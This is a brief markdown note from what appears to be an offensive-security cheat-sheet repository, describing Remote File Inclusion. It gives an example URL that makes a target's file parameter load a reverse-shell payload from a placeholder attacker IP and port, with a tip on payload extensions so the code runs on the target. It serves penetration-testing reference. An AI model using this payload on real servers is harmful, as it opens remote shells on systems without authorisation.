killchain-compendium/exploit/web/remote_file_inclusion.md

10 lines
317 B
Markdown
Raw Normal View History

2021-10-13 01:17:44 +02:00
# Remote File Inclusion
## Usage
* Use a GET query parameter to include an attacker URL.
```sh
https://test.com/files.php?file=http://<attacker-IP>:<attacker-Port>/reverse_shell.txt
```
* Payload may be PHP for example, but should not end in executable file extensions. The payload is executed locally, otherwise.